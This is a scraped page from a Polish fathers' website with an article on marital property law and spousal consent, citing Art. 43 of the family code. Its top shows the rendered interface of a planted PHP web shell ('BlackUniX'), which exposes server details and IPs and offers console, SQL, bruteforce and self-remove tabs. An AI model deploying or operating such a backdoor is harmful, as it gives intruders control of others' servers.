W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:55:21
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Małżeństwo, a sprawy majątkowe
16.03.2008.
Wszystko jest w porządku dopóki nie dojdzie do rozwodu. Wtedy nagle okazuje się, że "to mnie się należy... że ja na nas utrzymywałem itd."
Jakie rządzą tym wszystkim prawa?

Co jest majątkiem osobistym, a co wspólnym?

Z chwilą zawarcia małżeństwa powstaje między małżonkami wspólnota majątkowa. Obejmuje przedmioty nabyte podczas trwania małżeństwa. Należą do nich w szczególności:

-wynagrodzenie za pracę,

-dochody z majątku wspólnego, i osobistego,

-środki zgromadzone na rachunku otwartego lub pracowniczego funduszu emerytalnego


A to co nabyliśmy przed zawarciem związku małżeńskiego wlicza się do majątku odrębnego (osobistego):

-przedmioty majątkowe nabyte przed powstaniem wspólności ustawowej,

-przedmioty majątkowe nabyte przez dziedziczenie, zapis lub darowiznę, chyba że spadkodawca lub darczyńca inaczej postanowił,

-prawa majątkowe wynikające ze wspólności łącznej podlegającej odrębnym przepisom,

-przedmioty majątkowe służące wyłącznie do zaspokajania osobistych potrzeb jednego z małżonków,

-prawa niezbywalne, które mogą przysługiwać tylko jednej osobie,

-przedmioty uzyskane z tytułu odszkodowania za uszkodzenie ciała lub wywołanie rozstroju zdrowia albo z tytułu zadośćuczynienia za doznaną krzywdę; nie dotyczy to jednak renty należnej poszkodowanemu małżonkowi z powodu całkowitej lub częściowej utraty zdolności do pracy zarobkowej albo z powodu zwiększenia się jego potrzeb lub zmniejszenia widoków powodzenia na przyszłość,

  7)   wierzytelności z tytułu wynagrodzenia za pracę lub z tytułu innej działalności zarobkowej jednego z małżonków,

  8)   przedmioty majątkowe uzyskane z tytułu nagrody za osobiste osiągnięcia jednego z małżonków,

  9)   prawa autorskie i prawa pokrewne, prawa własności przemysłowej oraz inne prawa twórcy,

  10)  przedmioty majątkowe nabyte w zamian za składniki majątku osobistego, chyba że przepis szczególny stanowi inaczej.


Będąc w związku małżeńskim wiele istotnych decyzji musimy podejmować wspólnie.

Ważność umowy, która została zawarta przez jednego z małżonków bez wymaganej zgody drugiego, zależy od potwierdzenia umowy przez drugiego małżonka.

Jednostronna czynność prawna dokonana bez wymaganej zgody drugiego małżonka jest nieważna.


Do czego więc potrzebna jest zgoda współmałżonka?

-do zbycia, obciążenia, odpłatnego nabycia nieruchomości lub użytkowania wieczystego, oddania nieruchomości do używania lub pobierania z niej pożytków

-do zbycia, obciążenia, odpłatnego nabycia prawa rzeczowego, którego przedmiotem jest budynek lub lokal,

-do zbycia, obciążenia, odpłatnego nabycia i wydzierżawienia gospodarstwa rolnego lub przedsiębiorstwa,

-do darowizny z majątku wspólnego, z wyjątkiem drobnych darowizn zwyczajowo przyjętych.


Prawo chroniąc dobro rodziny przewidziało sytuację w której jeden z małżonków odmawia zgody na ww. czynności prawne: Jeżeli jeden z małżonków odmawia zgody wymaganej do dokonania czynności, albo jeżeli porozumienie z nim napotyka trudne do przezwyciężenia przeszkody, drugi małżonek może zwrócić się do sądu o zezwolenie na dokonanie czynności. Sąd udziela zezwolenia, jeżeli dokonania czynności wymaga dobro rodziny.

Jeżeli małżonek zaciągnął zobowiązanie za zgodą drugiego małżonka, wierzyciel może żądać zaspokojenia także z majątku wspólnego małżonków.

Art. 43. § 1. Oboje małżonkowie mają równe udziały w majątku wspólnym.

§ 2.  Jednakże z ważnych powodów każdy z małżonków może żądać, ażeby ustalenie udziałów w majątku wspólnym nastąpiło z uwzględnieniem stopnia, w którym każdy z nich przyczynił się do powstania tego majątku. Spadkobiercy małżonka mogą wystąpić z takim żądaniem tylko w wypadku, gdy spadkodawca wytoczył powództwo o unieważnienie małżeństwa albo o rozwód lub wystąpił o orzeczenie separacji.

§ 3. Przy ocenie, w jakim stopniu każdy z małżonków przyczynił się do powstania majątku wspólnego, uwzględnia się także nakład osobistej pracy przy wychowaniu dzieci i we wspólnym gospodarstwie domowym.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.